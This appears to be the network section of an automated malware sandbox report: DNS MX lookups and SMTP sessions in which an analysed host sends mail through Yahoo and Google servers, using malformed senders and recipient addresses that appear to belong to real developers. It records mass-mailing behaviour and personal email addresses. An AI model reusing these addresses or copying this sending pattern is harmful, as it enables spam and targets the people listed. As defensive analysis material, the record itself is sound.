                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.644685030 CET1.1.1.1192.168.2.40x11dfName error (3)2.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.843180895 CET1.1.1.1192.168.2.40x11dfName error (3)4.2.1nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:51.898251057 CET1.1.1.1192.168.2.40x11dfName error (3)1.1.49-custom.16nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:55.954401016 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.012269974 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.085059881 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.162161112 CET1.1.1.1192.168.2.40x11dfNo error (0)cryptsoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.989005089 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.169759035 CET1.1.1.1192.168.2.40x11dfName error (3)8.9.15nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.291544914 CET1.1.1.1192.168.2.40x11dfName error (3)8.110.4nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.458709002 CET1.1.1.1192.168.2.40x11dfName error (3)2.2.11nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.629976988 CET1.1.1.1192.168.2.40x11dfName error (3)2.6.33nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.798849106 CET1.1.1.1192.168.2.40x11dfName error (3)3.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.055202007 CET1.1.1.1192.168.2.40x11dfName error (3)3.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.243330002 CET1.1.1.1192.168.2.40x11dfName error (3)8.8.29nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.408608913 CET1.1.1.1192.168.2.40x11dfName error (3)7.22.5nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.595101118 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.775779963 CET1.1.1.1192.168.2.40x11dfName error (3)2.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.929356098 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.086363077 CET1.1.1.1192.168.2.40x11dfName error (3)3.3.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.217323065 CET1.1.1.1192.168.2.40x11dfName error (3)4.0.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.387880087 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.530201912 CET1.1.1.1192.168.2.40x11dfName error (3)0.23.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.587235928 CET1.1.1.1192.168.2.40x11dfName error (3)2.0.12nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.676064968 CET1.1.1.1192.168.2.40x11dfName error (3)2.0.12nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.712975979 CET1.1.1.1192.168.2.40x11dfName error (3)1.0.5nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.780025959 CET1.1.1.1192.168.2.40x11dfName error (3)1.0.5nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.842062950 CET1.1.1.1192.168.2.40x11dfName error (3)0.11.10nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.903774023 CET1.1.1.1192.168.2.40x11dfName error (3)0.11.10nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.962491989 CET1.1.1.1192.168.2.40x11dfName error (3)15.7.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.029608965 CET1.1.1.1192.168.2.40x11dfName error (3)15.7.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.153956890 CET1.1.1.1192.168.2.40x11dfName error (3)4.2.1nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:00.211914062 CET1.1.1.1192.168.2.40x11dfName error (3)2.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET1.1.1.1192.168.2.40x11dfNo error (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET1.1.1.1192.168.2.40x11dfNo error (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET1.1.1.1192.168.2.40x11dfNo error (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET1.1.1.1192.168.2.40x11dfNo error (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.723175049 CET1.1.1.1192.168.2.40x11dfNo error (0)cloudhead.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.724934101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET1.1.1.1192.168.2.40x11dfNo error (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET1.1.1.1192.168.2.40x11dfNo error (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET1.1.1.1192.168.2.40x11dfNo error (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET1.1.1.1192.168.2.40x11dfNo error (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.793731928 CET1.1.1.1192.168.2.40x11dfNo error (0)tootallnate.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.859818935 CET1.1.1.1192.168.2.40x11dfNo error (0)luiscouto.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:04.912470102 CET1.1.1.1192.168.2.40x4704No error (0)eforward1.registrar-servers.com162.255.118.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.103354931 CET1.1.1.1192.168.2.40x11dfName error (3)8.5.22nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.292927027 CET1.1.1.1192.168.2.40x11dfName error (3)3.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.477243900 CET1.1.1.1192.168.2.40x11dfName error (3)3.1.74nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.696531057 CET1.1.1.1192.168.2.40x11dfName error (3)7.2.9nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:06.855206013 CET1.1.1.1192.168.2.40x11dfName error (3)8.2.11nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.056210041 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.246150017 CET1.1.1.1192.168.2.40x11dfName error (3)2.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.367964029 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.435425997 CET1.1.1.1192.168.2.40x11dfName error (3)3.3.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.557687998 CET1.1.1.1192.168.2.40x11dfName error (3)4.0.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.682271004 CET1.1.1.1192.168.2.40x11dfName error (3)1.10.295nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.808274984 CET1.1.1.1192.168.2.40x11dfName error (3)2.2.15nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.871501923 CET1.1.1.1192.168.2.40x11dfName error (3)0.23.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.363017082 CET1.1.1.1192.168.2.40x11dfNo error (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.443315983 CET1.1.1.1192.168.2.40x11dfNo error (0)vision-media.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.490417004 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.730346918 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.978374958 CET1.1.1.1192.168.2.40xe0e2No error (0)mail.reg.ca66.196.36.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.916292906 CET1.1.1.1192.168.2.40x11dfName error (3)8.2.42nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.102771997 CET1.1.1.1192.168.2.40x11dfName error (3)3.4.2nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.289403915 CET1.1.1.1192.168.2.40x11dfName error (3)8.5.12nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.479007959 CET1.1.1.1192.168.2.40x11dfName error (3)7.2.9nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.664668083 CET1.1.1.1192.168.2.40x11dfName error (3)7.2.9nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.852395058 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.429430008 CET1.1.1.1192.168.2.40x11dfNo error (0)blakeembrey.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.429430008 CET1.1.1.1192.168.2.40x11dfNo error (0)blakeembrey.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET1.1.1.1192.168.2.40x11dfNo error (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET1.1.1.1192.168.2.40x11dfNo error (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET1.1.1.1192.168.2.40x11dfNo error (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET1.1.1.1192.168.2.40x11dfNo error (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.434763908 CET1.1.1.1192.168.2.40x11dfNo error (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.500766993 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.57.154.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.42.251.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.57.152.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.56.9.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.57.155.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.529772997 CET1.1.1.1192.168.2.40xb18dNo error (0)mx01.mail.icloud.com17.57.156.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.619131088 CET1.1.1.1192.168.2.40x11dfName error (3)2.5.3nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.680430889 CET1.1.1.1192.168.2.40x11dfName error (3)2.5.3nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.805989027 CET1.1.1.1192.168.2.40x11dfName error (3)18.2.0nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.002531052 CET1.1.1.1192.168.2.40x11dfName error (3)8.13.17nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.058168888 CET1.1.1.1192.168.2.40x11dfName error (3)8.6.28nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.120316029 CET1.1.1.1192.168.2.40x11dfName error (3)9.0.6nonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.175481081 CET254972967.195.204.73192.168.2.4220 mtaproxy408.free.mail.bf1.yahoo.com ESMTP ready
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.176533937 CET4972925192.168.2.467.195.204.73EHLO yahoo.com
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.286237955 CET254972967.195.204.73192.168.2.4250-mtaproxy408.free.mail.bf1.yahoo.com
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-SIZE 41943040
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250 STARTTLS
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.288876057 CET4972925192.168.2.467.195.204.73MAIL FROM: <jfkoofia@yahoo.com>
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.399158955 CET254972967.195.204.73192.168.2.4250 sender <jfkoofia@yahoo.com> ok
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.401060104 CET4972925192.168.2.467.195.204.73RCPT TO: <jfkoofia@yahoo.com>
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.511563063 CET254972967.195.204.73192.168.2.4250 recipient <jfkoofia@yahoo.com> ok
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.512382984 CET4972925192.168.2.467.195.204.73DATA
                                                                                                                                                                                                          Dec 4, 2023 12:56:39.622129917 CET254972967.195.204.73192.168.2.4354 go ahead
                                                                                                                                                                                                          Dec 4, 2023 12:56:41.599993944 CET4972925192.168.2.467.195.204.731603
                                                                                                                                                                                                          sQPsFUbNgjSh235
                                                                                                                                                                                                          Dec 4, 2023 12:56:42.095674038 CET254972967.195.204.73192.168.2.4554 5.7.9 Message not accepted for policy reasons. See https://postmaster.yahooinc.com/error-codes
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403122902 CET2549736172.253.115.27192.168.2.4220 mx.google.com ESMTP vy11-20020a05620a490b00b0077d6c4bdccbsi8971813qkn.421 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403768063 CET2549738172.253.115.27192.168.2.4220 mx.google.com ESMTP s10-20020a05620a0bca00b0077dc5232909si9606134qki.85 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.403778076 CET2549737172.253.115.27192.168.2.4220 mx.google.com ESMTP ou24-20020a05620a621800b0077f0edbec29si1657990qkn.537 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.404798031 CET4973625192.168.2.4172.253.115.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.409427881 CET2549739172.253.115.27192.168.2.4220 mx.google.com ESMTP w20-20020a05620a0e9400b0077bd0142498si8823806qkm.756 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.419950962 CET4973825192.168.2.4172.253.115.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.422151089 CET4973725192.168.2.4172.253.115.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.423943996 CET4973925192.168.2.4172.253.115.27EHLO gmail.com
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.529768944 CET2549736172.253.115.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.532470942 CET4973625192.168.2.4172.253.115.27MAIL FROM: <sdx-cardview-caret-rtl@3x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.537074089 CET2549738172.253.115.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.539388895 CET2549737172.253.115.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.540133953 CET4973825192.168.2.4172.253.115.27MAIL FROM: <sdx-cardview-backarrow-rtl@2x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.542522907 CET4973725192.168.2.4172.253.115.27MAIL FROM: <sdx-cardview-backarrow-rtl-dark@4x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.542678118 CET2549739172.253.115.27192.168.2.4250-mx.google.com at your service, [102.165.48.83]
                                                                                                                                                                                                          250-SIZE 157286400
                                                                                                                                                                                                          250-8BITMIME
                                                                                                                                                                                                          250-STARTTLS
                                                                                                                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                                                                                                                          250-PIPELINING
                                                                                                                                                                                                          250-CHUNKING
                                                                                                                                                                                                          250 SMTPUTF8
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.545432091 CET4973925192.168.2.4172.253.115.27MAIL FROM: <sdx-cardview-separator@3x.png>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.641387939 CET2549736172.253.115.27192.168.2.4250 2.1.0 OK vy11-20020a05620a490b00b0077d6c4bdccbsi8971813qkn.421 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.642986059 CET4973625192.168.2.4172.253.115.27RCPT TO: <kevinmartensson@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.649872065 CET2549738172.253.115.27192.168.2.4250 2.1.0 OK s10-20020a05620a0bca00b0077dc5232909si9606134qki.85 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.651273012 CET4973825192.168.2.4172.253.115.27RCPT TO: <zertosh@gmail.com>
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.652561903 CET2549737172.253.115.27192.168.2.4250 2.1.0 OK ou24-20020a05620a621800b0077f0edbec29si1657990qkn.537 - gsmtp
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.653894901 CET4973725192.168.2.4172.253.115.27RCPT TO: <sindresorhus@gmail.com>
